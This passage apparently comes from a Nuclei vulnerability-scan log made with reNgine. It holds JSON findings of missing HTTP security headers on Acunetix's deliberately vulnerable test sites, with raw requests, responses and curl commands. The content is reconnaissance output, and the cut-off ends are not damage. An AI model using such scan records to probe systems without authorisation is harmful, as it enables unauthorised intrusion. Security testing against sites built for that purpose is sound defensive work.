'http://testhtml5.vulnweb.com/static/app/libs/sessvars.js:105at'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"content-security-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/CVS/Entries.Log\",\"path\":\"/CVS/Entries.Log\",\"matched-at\":\"http://testphp.vulnweb.com/CVS/Entries.Log\",\"request\":\"GET /CVS/Entries.Log HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0 maglev/24046.2809.2757.3796/49\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 1\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nEtag: \\\"4dca64a4-1\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:48 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n \",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:07.149715797Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0 maglev/24046.2809.2757.3796/49' 'http://testphp.vulnweb.com/CVS/Entries.Log'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"clear-site-data\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/static/app/partials\",\"path\":\"/static/app/partials\",\"matched-at\":\"http://testhtml5.vulnweb.com/static/app/partials/\",\"request\":\"GET /static/app/partials HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 Edg/113.0.1774.32\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 403 Forbidden\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:40:50 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e403 Forbidden\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e403 Forbidden\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:07.149710713Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 Edg/113.0.1774.32' 'http://testhtml5.vulnweb.com/static/app/partials'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-embedder-policy\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/contact\",\"path\":\"/contact\",\"matched-at\":\"http://testhtml5.vulnweb.com/contact\",\"request\":\"GET /contact HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 Edg/96.0.1054.53\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 405 METHOD NOT ALLOWED\\r\\nConnection: close\\r\\nContent-Length: 178\\r\\nAllow: POST, OPTIONS\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 3.2 Final//EN\\\"\\u003e\\n\\u003ctitle\\u003e405 Method Not Allowed\\u003c/title\\u003e\\n\\u003ch1\\u003eMethod Not Allowed\\u003c/h1\\u003e\\n\\u003cp\\u003eThe method is not allowed for the requested URL.\\u003c/p\\u003e\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:07.149677559Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 Edg/96.0.1054.53' 'http://testhtml5.vulnweb.com/contact'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-permitted-cross-domain-policies\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/forgotpw\",\"path\":\"/forgotpw\",\"matched-at\":\"http://testhtml5.vulnweb.com/forgotpw\",\"request\":\"GET /forgotpw HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/604.4.15 (KHTML, like Gecko) Version/16.3 Safari/604.4.1\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 405 METHOD NOT ALLOWED\\r\\nConnection: close\\r\\nContent-Length: 178\\r\\nAllow: POST, OPTIONS\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 3.2 Final//EN\\\"\\u003e\\n\\u003ctitle\\u003e405 Method Not Allowed\\u003c/title\\u003e\\n\\u003ch1\\u003eMethod Not Allowed\\u003c/h1\\u003e\\n\\u003cp\\u003eThe method is not allowed for the requested URL.\\u003c/p\\u003e\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:07.1497439Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/604.4.15 (KHTML, like Gecko) Version/16.3 Safari/604.4.1' 'http://testhtml5.vulnweb.com/forgotpw'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"referrer-policy\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/samples\",\"path\":\"/samples\",\"matched-at\":\"http://testhtml5.vulnweb.com/samples\",\"request\":\"GET /samples HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 4.01 Transitional//EN\\\"\\n \\\"http://www.w3.org/TR/html4/loose.dtd\\\"\\u003e\\n\\u003chtml\\u003e\\n\\u003chead\\u003e\\n \\u003ctitle\\u003ePython samples\\u003c/title\\u003e\\n\\u003c/head\\u003e\\n\\u003cbody\\u003e\\n \\u003ch3\\u003eSimple python programs:\\u003c/h3\\u003e\\n \\u003cul\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"/getfile?fname=sample1.py\\\"\\u003eFirst sample\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"/getfile?fname=sample1.py\\\"\\u003eSecond sample\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003c/ul\\u003e\\n\\u003c/body\\u003e\\n\\u003c/html\\u003e\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:07.442274566Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36' 'http://testhtml5.vulnweb.com/samples'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"clear-site-data\",\"type\":\"http\",\"host\":\"testasp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testasp.vulnweb.com\",\"matched-at\":\"http://testasp.vulnweb.com\",\"request\":\"GET / HTTP/1.1\\r\\nHost: testasp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.2420.102\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 3541\\r\\nCache-Control: private\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:40:45 GMT\\r\\nServer: Microsoft-IIS/8.5\\r\\nSet-Cookie: ASPSESSIONIDSASBSTRC=LIKALMIBLAODJLDJGONMEJAO; path=/\\r\\nX-Powered-By: ASP.NET\\r\\n\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 4.01 Transitional//EN\\\" \\\"http://www.w3.org/TR/html4/loose.dtd\\\"\\u003e\\r\\n\\u003chtml\\u003e\\u003c!-- InstanceBegin template=\\\"/Templates/MainTemplate.dwt.asp\\\" codeOutsideHTMLIsLocked=\\\"false\\\" --\\u003e\\r\\n\\u003chead\\u003e\\r\\n\\u003c!-- InstanceBeginEditable name=\\\"doctitle\\\" --\\u003e\\r\\n\\u003ctitle\\u003eacuforum forums\\u003c/title\\u003e\\r\\n\\u003c!-- InstanceEndEditable --\\u003e\\r\\n\\u003cmeta http-equiv=\\\"Content-Type\\\" content=\\\"text/html; charset=iso-8859-1\\\"\\u003e\\r\\n\\u003c!-- InstanceBeginEditable name=\\\"head\\\" --\\u003e\\r\\n\\u003c!-- InstanceEndEditable --\\u003e\\r\\n\\u003clink href=\\\"styles.css\\\" rel=\\\"stylesheet\\\" type=\\\"text/css\\\"\\u003e\\r\\n\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e \\r\\n\\u003ctable width=\\\"100%\\\" border=\\\"0\\\" cellpadding=\\\"10\\\" cellspacing=\\\"0\\\"\\u003e \\r\\n \\u003ctr bgcolor=\\\"#008F00\\\"\\u003e \\r\\n \\u003ctd width=\\\"306px\\\"\\u003e\\u003ca href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cimg src=\\\"Images/logo.gif\\\" width=\\\"306\\\" height=\\\"38\\\" border=\\\"0\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u003c/a\\u003e\\u003c/td\\u003e \\r\\n \\u003ctd align=\\\"right\\\" valign=\\\"middle\\\" bgcolor=\\\"#008F00\\\" class=\\\"disclaimer\\\"\\u003eTEST and Demonstration site for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e\\u003c/td\\u003e \\r\\n \\u003c/tr\\u003e \\r\\n \\u003ctr\\u003e \\r\\n \\u003ctd colspan=\\\"2\\\"\\u003e\\u003cdiv class=\\\"menubar\\\"\\u003e\\u003ca href=\\\"Templatize.asp?item=html/about.html\\\" class=\\\"menu\\\"\\u003eabout\\u003c/a\\u003e - \\u003ca href=\\\"Default.asp\\\" class=\\\"menu\\\"\\u003eforums\\u003c/a\\u003e - \\u003ca href=\\\"Search.asp\\\" class=\\\"menu\\\"\\u003esearch\\u003c/a\\u003e \\r\\n - \\u003ca href=\\\"./Login.asp?RetURL=%2FDefault%2Easp%3F\\\" class=\\\"menu\\\"\\u003elogin\\u003c/a\\u003e - \\u003ca href=\\\"./Register.asp?RetURL=%2FDefault%2Easp%3F\\\" class=\\\"menu\\\"\\u003eregister\\u003c/a\\u003e \\r\\n\\t- \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/sql-injection/\\\" class=\\\"menu\\\"\\u003eSQL scanner\\u003c/a\\u003e - \\u003ca href=\\\"https://www.acunetix.com/websitesecurity/sql-injection/\\\" class=\\\"menu\\\"\\u003eSQL vuln help\\u003c/a\\u003e\\r\\n \\u003c/div\\u003e\\u003c/td\\u003e \\r\\n \\u003c/tr\\u003e \\r\\n \\u003ctr\\u003e \\r\\n \\u003ctd colspan=\\\"2\\\"\\u003e\\u003c!-- InstanceBeginEditable name=\\\"MainContentLeft\\\" --\\u003e\\r\\n\\t\\u003ctable width=\\\"100%\\\" border=\\\"0\\\" cellspacing=\\\"0\\\" cellpadding=\\\"5\\\"\\u003e\\r\\n \\u003ctr\\u003e\\r\\n \\u003ctd class=\\\"tableheader\\\"\\u003eForum\\u003c/td\\u003e\\r\\n \\u003ctd class=\\\"tableheader\\\"\\u003eThreads\\u003c/td\\u003e\\r\\n \\u003ctd class=\\\"tableheader\\\"\\u003ePosts\\u003c/td\\u003e\\r\\n \\u003ctd class=\\\"tableheader\\\"\\u003eLast Post\\u003c/td\\u003e\\r\\n \\u003c/tr\\u003e \\r\\n\\t\\u003ctr bgcolor='#FFFFFF'\\u003e\\u003ctd\\u003e\\u003cdiv class='forumtitle'\\u003e\\u003ca href='showforum.asp?id=0'\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e\\u003c/div\\u003e\\u003cdiv class='forumdescription'\\u003eTalk about Acunetix Web Vulnerablity Scanner\\u003c/div\\u003e\\u003c/td\\u003e\\u003ctd\\u003e82\\u003c/td\\u003e\\u003ctd\\u003e82\\u003c/td\\u003e\\u003ctd\\u003e11/13/2024 2:31:30 AM\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr bgcolor='#e9ffe9'\\u003e\\u003ctd\\u003e\\u003cdiv class='forumtitle'\\u003e\\u003ca href='showforum.asp?id=1'\\u003eWeather\\u003c/a\\u003e\\u003c/div\\u003e\\u003cdiv class='forumdescription'\\u003eWhat weather is in your town right now\\u003c/div\\u003e\\u003c/td\\u003e\\u003ctd\\u003e1\\u003c/td\\u003e\\u003ctd\\u003e1\\u003c/td\\u003e\\u003ctd\\u003e11/9/2005 12:16:35 PM\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr bgcolor='#FFFFFF'\\u003e\\u003ctd\\u003e\\u003cdiv class='forumtitle'\\u003e\\u003ca href='showforum.asp?id=2'\\u003eMiscellaneous\\u003c/a\\u003e\\u003c/div\\u003e\\u003cdiv class='forumdescription'\\u003eAnything crossing your mind can be posted here\\u003c/div\\u003e\\u003c/td\\u003e\\u003ctd\\u003e0\\u003c/td\\u003e\\u003ctd\\u003e0\\u003c/td\\u003e\\u003ctd\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\r\\n\\t\\u003c/table\\u003e\\u003c!-- InstanceEndEditable --\\u003e\\u003c/td\\u003e \\r\\n \\u003c/tr\\u003e \\r\\n \\u003ctr align=\\\"right\\\" bgcolor=\\\"#FFFFFF\\\"\\u003e \\r\\n \\u003ctd colspan=\\\"2\\\" class=\\\"footer\\\"\\u003eCopyright 2019 Acunetix Ltd.\\u003c/td\\u003e \\r\\n \\u003c/tr\\u003e \\r\\n\\u003c/table\\u003e \\r\\n\\u003cdiv style=\\\"background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px\\\"\\u003e\\r\\n\\t\\u003cp style=\\\"padding-left:20%;padding-right:20%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.\\u003c/p\\u003e\\r\\n\\u003c/div\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c!-- InstanceEnd --\\u003e\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.238.29.244\",\"timestamp\":\"2024-11-13T02:41:07.442226053Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.2420.102' 'http://testasp.vulnweb.com'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"permissions-policy\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/report\",\"path\":\"/report\",\"matched-at\":\"http://testhtml5.vulnweb.com/report\",\"request\":\"GET /report HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 AVG/123.0.0.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE html\\u003e\\n\\u003chtml lang=\\\"en\\\" xmlns=\\\"http://www.w3.org/1999/html\\\" data-ng-app=\\\"itemsApp\\\"\\u003e\\n\\u003chead\\u003e\\n \\u003cmeta charset=\\\"utf-8\\\"\\u003e\\n \\u003ctitle\\u003eSecurityTweets\\u003c/title\\u003e\\n \\u003cmeta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\"\\u003e\\n \\u003cmeta name=\\\"description\\\" content=\\\"\\\"\\u003e\\n \\u003cmeta name=\\\"author\\\" content=\\\"\\\"\\u003e\\n\\n \\u003c!-- Le styles --\\u003e\\n \\u003clink href=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003c!--\\u003clink href=\\\"http://netdna.bootstrapcdn.com/font-awesome/3.0.2/css/font-awesome.css\\\" rel=\\\"stylesheet\\\"\\u003e--\\u003e\\n \\u003clink href='http://fonts.googleapis.com/css?family=Open+Sans:700' rel='stylesheet' type='text/css'\\u003e\\n \\u003clink href=\\\"/static/css/style.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003cstyle type=\\\"text/css\\\"\\u003e\\n body {\\n padding-top: 60px;\\n padding-bottom: 40px;\\n }\\n .sidebar-nav {\\n padding: 9px 0;\\n }\\n\\n @media (max-width: 980px) {\\n /* Enable use of floated navbar text */\\n .navbar-text.pull-right {\\n float: none;\\n padding-left: 5px;\\n padding-right: 5px;\\n }\\n }\\n \\u003c/style\\u003e\\n\\u003c/head\\u003e\\n\\n\\u003cbody\\u003e\\n\\n\\u003cdiv class=\\\"navbar navbar-fixed-top\\\"\\u003e\\n \\u003cdiv class=\\\"navbar-inner\\\"\\u003e\\n \\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cbutton type=\\\"button\\\" class=\\\"btn btn-navbar\\\" data-toggle=\\\"collapse\\\" data-target=\\\".nav-collapse\\\"\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003c/button\\u003e\\n \\u003ca class=\\\"brand\\\" href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cimg src=\\\"/static/img/logo2.png\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u003c/a\\u003e\\n \\u003cp class=\\\"navbar-text pull-left\\\"\\u003e\\n HTML5 test website for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e.\\n \\u003c/p\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\u003c/div\\u003e\\n\\n\\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"span2\\\"\\u003e\\n \\u003cdiv class=\\\"well sidebar-nav\\\"\\u003e\\n \\u003cul class=\\\"nav nav-list\\\"\\u003e\\n \\u003cli class=\\\"nav-header\\\"\\u003eAction\\u003c/li\\u003e\\n \\u003cli class=\\\"active\\\"\\u003e\\u003ca href=\\\"#/response\\\"\\u003eResponse\\u003c/a\\u003e\\u003c/li\\u003e\\n\\n \\u003cli class=\\\"nav-header\\\"\\u003eAcunetix\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/\\\"\\u003eWebsite\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/html5-website-security/\\\"\\u003eHTML5 scanner\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/\\\"\\u003eHTML5 vuln help\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/blog/\\\"\\u003eBlog\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.facebook.com/Acunetix\\\"\\u003eFacebook\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.twitter.com/acunetix/\\\"\\u003eTwitter\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003c/ul\\u003e\\n \\u003c/div\\u003e\\u003c!--/.well --\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003cdiv class=\\\"span10\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\n Your report was submitted, thanks. \\u003c!-- invalid --\\u003e\\n \\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n\\n \\u003chr\\u003e\\n\\t\\n\\t\\u003cdiv style=\\\"background-color:lightgray;width:100%;text-align:center;font-size:14px\\\"\\u003e\\n\\t\\t\\u003cp 